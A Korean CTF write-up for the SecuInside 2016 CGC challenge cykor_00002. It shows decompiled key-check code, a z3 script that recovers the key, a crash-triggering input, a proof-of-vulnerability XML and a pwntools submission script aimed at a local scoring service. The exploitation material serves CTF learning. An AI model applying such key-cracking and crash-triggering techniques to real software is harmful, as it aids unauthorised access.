[CGC] SecuInside 2016(CGC/cykor_00002)

https://github.com/ctfs/write-ups-2016/tree/master/secuinside-ctf-quals-2016/cgc/cykor_00002-150

write up : https://ctf.rip/secuinside2016-cykor00002/

vagrant@crs:~$ ./cykor_00002 ---------------------------------------- -          Simple Echo System          - ---------------------------------------- What is your name? name: ADMIN + Gimme a key : aaaaaaaaaaaaaaa Get out of here :(

우선 실행하고 실행 된 내용 문자열을 기반으로 ida 분석을 진행 하도록 합시다.

int main_sub_8048F50() {   char v1; // [esp+70h] [ebp-448h]@1   char v2; // [esp+B0h] [ebp-408h]@3   char v3; // [esp+B1h] [ebp-407h]@4   int v4; // [esp+4B0h] [ebp-8h]@1   v4 = 0;   sub_8049FC0("----------------------------------------\n");   sub_8049FC0("-          Simple Echo System          -\n");   sub_8049FC0("----------------------------------------\n");   sub_8049FC0("What is your name?\n");   sub_8048E90(&v1);   if ( sub_8048E10((int)&v1, (int)"ADMIN", 5u) )   {     sub_8049FC0("Hi %s\n");     sub_8049FC0(": ");     *(&v2 + sub_80480A0(&v2, 1000, 10)) = 0;     sub_8049FC0("%s\n");   }   else   {     sub_8049FC0("+ Gimme a key : ");     sub_80480A0(&01_byte_805F454, 27, 10);     if ( compare_key_sub_8048150() )     {       sub_8049FC0("Welcome Admin :)\n");       sub_8049FC0(": ");       sub_80480A0(&v2, 1000, 10);       if ( v2 == 'C' && v3 == 'K' )         MEMORY[0] = 10;       sub_8049FC0("%s\n");     }     else     {       sub_8049FC0("Get out of here :(\n");     }   }   return 0; }

compare_key_sub_8048150() 를 확인 하면 특정 값을 맞춰야지, 통과할 수 있게 되어 있습니다.

_BOOL4 compare_key_sub_8048150() {   signed int v1; // [esp+0h] [ebp-4h]@1   v1 = 0;   if ( 21_byte_805F468      + 04_byte_805F457      + 13_byte_805F460      + 22_byte_805F469      + 24_byte_805F46B      + 08_byte_805F45B      + 02_byte_805F455      + 07_byte_805F45A      + 10_byte_805F45D      + 18_byte_805F465      + 12_byte_805F45F      + 19_byte_805F466      + 06_byte_805F459 == 1068 )     v1 = 1;   if ( 11_byte_805F45E      + 08_byte_805F45B      + 10_byte_805F45D      + 18_byte_805F465      + 19_byte_805F466      + 23_byte_805F46A      + 03_byte_805F456      + 02_byte_805F455      + 14_byte_805F461      + 16_byte_805F463 == 760 )     ++v1;   if ( 15_byte_805F462      + 02_byte_805F455      + 10_byte_805F45D      + 17_byte_805F464      + 01_byte_805F454      + 14_byte_805F461      + 16_byte_805F463      + 12_byte_805F45F      + 13_byte_805F460      + 21_byte_805F468      + 06_byte_805F459      + 23_byte_805F46A      + 22_byte_805F469 == 997 )     ++v1;   if ( 05_byte_805F458      + 09_byte_805F45C      + 20_byte_805F467      + 22_byte_805F469      + 02_byte_805F455      + 07_byte_805F45A      + 24_byte_805F46B      + 14_byte_805F461      + 17_byte_805F464      + 13_byte_805F460 == 782 )     ++v1;   if ( 20_byte_805F467      + 11_byte_805F45E      + 19_byte_805F466      + 17_byte_805F464      + 14_byte_805F461      + 03_byte_805F456      + 08_byte_805F45B      + 07_byte_805F45A      + 21_byte_805F468      + 15_byte_805F462 == 778 )     ++v1;   if ( 21_byte_805F468      + 20_byte_805F467      + 06_byte_805F459      + 10_byte_805F45D      + 05_byte_805F458      + 15_byte_805F462      + 23_byte_805F46A      + 22_byte_805F469      + 04_byte_805F457      + 25_byte_805F46C      + 13_byte_805F460      + 24_byte_805F46B      + 19_byte_805F466      + 14_byte_805F461 == 1123 )     ++v1;   if ( 23_byte_805F46A      + 09_byte_805F45C      + 06_byte_805F459      + 14_byte_805F461      + 16_byte_805F463      + 12_byte_805F45F      + 08_byte_805F45B      + 11_byte_805F45E      + 02_byte_805F455      + 19_byte_805F466      + 01_byte_805F454      + 15_byte_805F462      + 20_byte_805F467      + 03_byte_805F456      + 24_byte_805F46B == 1180 )     ++v1;   if ( 06_byte_805F459      + 25_byte_805F46C      + 12_byte_805F45F      + 24_byte_805F46B      + 20_byte_805F467      + 23_byte_805F46A      + 01_byte_805F454      + 05_byte_805F458      + 04_byte_805F457      + 09_byte_805F45C      + 14_byte_805F461      + 21_byte_805F468      + 19_byte_805F466      + 03_byte_805F456      + 10_byte_805F45D      + 18_byte_805F465      + 08_byte_805F45B      + 13_byte_805F460 == 1498 )     ++v1;   if ( 19_byte_805F466      + 24_byte_805F46B      + 15_byte_805F462      + 05_byte_805F458      + 25_byte_805F46C      + 02_byte_805F455      + 01_byte_805F454      + 22_byte_805F469      + 06_byte_805F459      + 17_byte_805F464      + 08_byte_805F45B      + 13_byte_805F460      + 16_byte_805F463      + 21_byte_805F468      + 04_byte_805F457 == 1213 )     ++v1;   if ( 18_byte_805F465      + 22_byte_805F469      + 10_byte_805F45D      + 11_byte_805F45E      + 07_byte_805F45A      + 15_byte_805F462      + 21_byte_805F468      + 02_byte_805F455      + 09_byte_805F45C      + 25_byte_805F46C == 779 )     ++v1;   if ( 01_byte_805F454      + 04_byte_805F457      + 20_byte_805F467      + 03_byte_805F456      + 24_byte_805F46B      + 23_byte_805F46A      + 16_byte_805F463      + 21_byte_805F468      + 05_byte_805F458 == 742 )     ++v1;   if ( 16_byte_805F463      + 24_byte_805F46B      + 20_byte_805F467      + 07_byte_805F45A      + 18_byte_805F465      + 11_byte_805F45E      + 09_byte_805F45C      + 05_byte_805F458      + 06_byte_805F459      + 12_byte_805F45F      + 02_byte_805F455      + 10_byte_805F45D      + 15_byte_805F462      + 04_byte_805F457      + 21_byte_805F468 == 1196 )     ++v1;   if ( 07_byte_805F45A      + 02_byte_805F455      + 09_byte_805F45C      + 14_byte_805F461      + 12_byte_805F45F      + 25_byte_805F46C      + 13_byte_805F460      + 22_byte_805F469      + 19_byte_805F466      + 24_byte_805F46B      + 15_byte_805F462      + 16_byte_805F463      + 23_byte_805F46A      + 18_byte_805F465 == 1091 )     ++v1;   if ( 22_byte_805F469      + 18_byte_805F465      + 23_byte_805F46A      + 01_byte_805F454      + 05_byte_805F458      + 02_byte_805F455      + 19_byte_805F466      + 20_byte_805F467      + 13_byte_805F460 == 764 )     ++v1;   if ( 14_byte_805F461      + 17_byte_805F464      + 23_byte_805F46A      + 02_byte_805F455      + 12_byte_805F45F      + 25_byte_805F46C      + 18_byte_805F465      + 15_byte_805F462      + 11_byte_805F45E      + 05_byte_805F458      + 09_byte_805F45C      + 08_byte_805F45B      + 01_byte_805F454      + 19_byte_805F466      + 07_byte_805F45A      + 22_byte_805F469      + 21_byte_805F468      + 10_byte_805F45D == 1463 )     ++v1;   if ( 16_byte_805F463 + 09_byte_805F45C + 02_byte_805F455 + 12_byte_805F45F + 22_byte_805F469 + 20_byte_805F467 == 465 )     ++v1;   if ( 17_byte_805F464      + 19_byte_805F466      + 12_byte_805F45F      + 25_byte_805F46C      + 05_byte_805F458      + 20_byte_805F467      + 13_byte_805F460      + 02_byte_805F455      + 07_byte_805F45A      + 14_byte_805F461      + 01_byte_805F454      + 22_byte_805F469 == 955 )     ++v1;   if ( 07_byte_805F45A      + 08_byte_805F45B      + 22_byte_805F469      + 19_byte_805F466      + 01_byte_805F454      + 10_byte_805F45D      + 15_byte_805F462      + 18_byte_805F465 == 654 )     ++v1;   if ( 02_byte_805F455      + 03_byte_805F456      + 17_byte_805F464      + 13_byte_805F460      + 24_byte_805F46B      + 01_byte_805F454      + 11_byte_805F45E      + 07_byte_805F45A      + 21_byte_805F468      + 19_byte_805F466      + 23_byte_805F46A      + 08_byte_805F45B      + 16_byte_805F463 == 1030 )     ++v1;   if ( 23_byte_805F46A + 24_byte_805F46B + 12_byte_805F45F == 275 )     ++v1;   if ( 22_byte_805F469      + 04_byte_805F457      + 02_byte_805F455      + 21_byte_805F468      + 01_byte_805F454      + 09_byte_805F45C      + 13_byte_805F460 == 563 )     ++v1;   if ( 15_byte_805F462 + 06_byte_805F459 + 12_byte_805F45F + 19_byte_805F466 + 18_byte_805F465 + 25_byte_805F46C == 509 )     ++v1;   if ( 20_byte_805F467      + 11_byte_805F45E      + 13_byte_805F460      + 22_byte_805F469      + 17_byte_805F464      + 25_byte_805F46C      + 15_byte_805F462 == 556 )     ++v1;   if ( 02_byte_805F455      + 13_byte_805F460      + 22_byte_805F469      + 20_byte_805F467      + 19_byte_805F466      + 03_byte_805F456      + 04_byte_805F457      + 12_byte_805F45F      + 16_byte_805F463      + 24_byte_805F46B      + 23_byte_805F46A      + 18_byte_805F465      + 25_byte_805F46C      + 09_byte_805F45C      + 06_byte_805F459      + 11_byte_805F45E      + 21_byte_805F468      + 17_byte_805F464 == 1464 )     ++v1;   if ( 15_byte_805F462      + 22_byte_805F469      + 08_byte_805F45B      + 23_byte_805F46A      + 21_byte_805F468      + 06_byte_805F459      + 17_byte_805F464      + 11_byte_805F45E      + 12_byte_805F45F == 758 )     ++v1;   return v1 == 25; }

여기에 있는 변수를 다음과 같이 치환하여 python의 수학 라이브러리인 z3 라이브러리를 활용 하여 맞는 값을 찾습니다.

(※ z3 : https://github.com/Z3Prover/z3)

babyhack@ubuntu:~$ python scripts/mk_make.py --python --pypkgdir=/usr/lib/python2.7/dist-packages babyhack@ubuntu:~$ cd ./build/make; sudo make install

z3가 준비 되었다면, 다음의 코드를 사용하면 됩니다.

from z3 import * var_0 = Int('var_0') var_1 = Int('var_1') var_2 = Int('var_2') var_3 = Int('var_3') var_4 = Int('var_4') var_5 = Int('var_5') var_6 = Int('var_6') var_7 = Int('var_7') var_8 = Int('var_8') var_9 = Int('var_9') var_10 = Int('var_10') var_11 = Int('var_11') var_12 = Int('var_12') var_13 = Int('var_13') var_14 = Int('var_14') var_15 = Int('var_15') var_16 = Int('var_16') var_17 = Int('var_17') var_18 = Int('var_18') var_19 = Int('var_19') var_20 = Int('var_20') var_21 = Int('var_21') var_22 = Int('var_22') var_23 = Int('var_23') var_24 = Int('var_24') var_25 = Int('var_25') solve(var_20 + var_3 + var_12 + var_21 + var_23 + var_7 + var_1 + var_6 + var_9 + var_17 + var_11 + var_18 + var_5 == 1068,var_10 + var_7 + var_9 + var_17 + var_18 + var_22 + var_2 + var_1 + var_13 + var_15 == 760,var_14 + var_1 + var_9 + var_16 + var_0 + var_13 + var_15 + var_11 + var_12 + var_20 + var_5 + var_22 + var_21 == 997,var_4 + var_8 + var_19 + var_21 + var_1 + var_6 + var_23 + var_13 + var_16 + var_12 == 782,var_19 + var_10 + var_18 + var_16 + var_13 + var_2 + var_7 + var_6 + var_20 + var_14 == 778,var_20 + var_19 + var_5 + var_9 + var_4 + var_14 + var_22 + var_21 + var_3 + var_24 + var_12 + var_23 + var_18 + var_13 == 1123,var_22 + var_8 + var_5 + var_13 + var_15 + var_11 + var_7 + var_10 + var_1 + var_18 + var_0 + var_14 + var_19 + var_2 + var_23 == 1180,var_5 + var_24 + var_11 + var_23 + var_19 + var_22 + var_0 + var_4 + var_3 + var_8 + var_13 + var_20 + var_18 + var_2 + var_9 + var_17 + var_7 + var_12 == 1498,var_18 + var_23 + var_14 + var_4 + var_24 + var_1 + var_0 + var_21 + var_5 + var_16 + var_7 + var_12 + var_15 + var_20 + var_3 == 1213,var_17 + var_21 + var_9 + var_10 + var_6 + var_14 + var_20 + var_1 + var_8 + var_24 == 779,var_0 + var_3 + var_19 + var_2 + var_23 + var_22 + var_15 + var_20 + var_4 == 742,var_15 + var_23 + var_19 + var_6 + var_17 + var_10 + var_8 + var_4 + var_5 + var_11 + var_1 + var_9 + var_14 + var_3 + var_20 == 1196,var_6 + var_1 + var_8 + var_13 + var_11 + var_24 + var_12 + var_21 + var_18 + var_23 + var_14 + var_15 + var_22 + var_17 == 1091,var_21 + var_17 + var_22 + var_0 + var_4 + var_1 + var_18 + var_19 + var_12 == 764,var_13 + var_16 + var_22 + var_1 + var_11 + var_24 + var_17 + var_14 + var_10 + var_4 + var_8 + var_7 + var_0 + var_18 + var_6 + var_21 + var_20 + var_9 == 1463,var_15 + var_8 + var_1 + var_11 + var_21 + var_19 == 465,var_16 + var_18 + var_11 + var_24 + var_4 + var_19 + var_12 + var_1 + var_6 + var_13 + var_0 + var_21 == 955,var_6 + var_7 + var_21 + var_18 + var_0 + var_9 + var_14 + var_17 == 654,var_1 + var_2 + var_16 + var_12 + var_23 + var_0 + var_10 + var_6 + var_20 + var_18 + var_22 + var_7 + var_15 == 1030,var_22 + var_23 + var_11 == 275,var_21 + var_3 + var_1 + var_20 + var_0 + var_8 + var_12 == 563,var_14 + var_5 + var_11 + var_18 + var_17 + var_24 == 509,var_19 + var_10 + var_12 + var_21 + var_16 + var_24 + var_14 == 556,var_1 + var_12 + var_21 + var_19 + var_18 + var_2 + var_3 + var_11 + var_15 + var_23 + var_22 + var_17 + var_24 + var_8 + var_5 + var_10 + var_20 + var_16 == 1464,var_14 + var_21 + var_7 + var_22 + var_20 + var_5 + var_16 + var_10 + var_11 == 758)

[ result ] babyhack@ubuntu:~/tmp/Secuinside/2016$ python exp.py [var_16 = 89,  var_23 = 85,  var_20 = 82,  var_1 = 72,  var_6 = 69,  var_12 = 77,  var_15 = 51,  var_19 = 85,  var_22 = 95,  var_21 = 78,  var_5 = 77,  var_14 = 78,  var_11 = 95,  var_9 = 72,  var_3 = 87,  var_10 = 69,  var_17 = 95,  var_4 = 95,  var_7 = 95,  var_8 = 84,  var_2 = 79,  var_13 = 48,  var_18 = 84,  var_24 = 80,  var_0 = 83] babyhack@ubuntu:~/tmp/Secuinside/2016$

10진수로 표시 되기 때문에 문자로 표시 하는 코드를 작성 해야 한다.

[ covert ] babyhack@ubuntu:~/tmp/Secuinside/2016$ cat sort.py var_16 = 89 var_23 = 85 var_20 = 82 var_1 = 72 var_6 = 69 var_12 = 77 var_15 = 51 var_19 = 85 var_22 = 95 var_21 = 78 var_5 = 77 var_14 = 78 var_11 = 95 var_9 = 72 var_3 = 87 var_10 = 69 var_17 = 95 var_4 = 95 var_7 = 95 var_8 = 84 var_2 = 79 var_13 = 48 var_18 = 84 var_24 = 80 var_0 = 83 print chr(var_0)+chr(var_1)+chr(var_2)+chr(var_3)+chr(var_4)+chr(var_5)+chr(var_6)+chr(var_7)+chr(var_8)+chr(var_9)+chr(var_10)+chr(var_11)+chr(var_12)+chr(var_13)+chr(var_14)+chr(var_15)+chr(var_16)+chr(var_17)+chr(var_18)+chr(var_19)+chr(var_20)+chr(var_21)+chr(var_22)+chr(var_23)+chr(var_24) babyhack@ubuntu:~/tmp/Secuinside/2016$

[ result ] babyhack@ubuntu:~/tmp/Secuinside/2016$ python sort.py SHOW_ME_THE_M0N3Y_TURN_UP babyhack@ubuntu:~/tmp/Secuinside/2016$

이제 찾은 내용을 테스트 해 보도록 합시다.

vagrant@crs:~$ ./cykor_00002 ---------------------------------------- -          Simple Echo System          - ---------------------------------------- What is your name? name: ADMIN + Gimme a key : HOW_ME_THE_M0N3Y_TURN_UP Get out of here :( vagrant@crs:~$ ./cykor_00002 ---------------------------------------- -          Simple Echo System          - ---------------------------------------- What is your name? name: SHOW_ME_THE_M0N3Y_TURN_UP Hi SHOW_ME_THE_M0N3Y_TURN_UP : vagrant@crs:~$ vagrant@crs:~$ ./cykor_00002 ---------------------------------------- -          Simple Echo System          - ---------------------------------------- What is your name? name: ADMIN + Gimme a key : SHOW_ME_THE_M0N3Y_TURN_UP Welcome Admin :) : CK Segmentation fault (core dumped) vagrant@crs:~$

CGC에 전달하는 코드 작성은 예제 코드를 기반으로 XML 작성 합니다.

<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd"> <pov>        <cbid>service</cbid>         <replay>               // recv               <read><delim>\x0a</delim><match><data>----------------------------------------\x0a</data></match></read>               <read><delim>\x0a</delim><match><data>-          Simple Echo System          -\x0a</data></match></read>               <read><delim>\x0a</delim><match><data>----------------------------------------\x0a</data></match></read>               <read><delim>\x0a</delim><match><data>What is your name?\x0a</data></match></read>               <read><delim>\x0a</delim><match><data>name: \x0a</data></match></read>               // send               <write><data>ADMIN\x0a</data></write>               // recv               <read><delim>\x0a</delim><match><data>+ Gimme a key : \x0a</data></match></read>               // send               <write><data>SHOW_ME_THE_M0N3Y_TURN_UP\x0a</data></write>               // recv               <read><delim>\x0a</delim><match><data>Welcome Admin :)\x0a</data></match></read>               <read><delim>\x0a</delim><match><data>: \x0a</data></match></read>               // send               <write><data>CK\x0a</data></write>         </replay> </pov>

exploit 코드는 다음과 같습니다.

#!/usr/bin/python from pwn import * xml_name = "pov.xml" host, port = "127.0.0.1", 1234 r = remote(host,port) print r.recvline() r.sendline("XML") payload = open(xml_name,'rb').read() print r.recvline() r.sendline(str(len(payload))) print r.recvline() r.sendline(payload) r.interactive()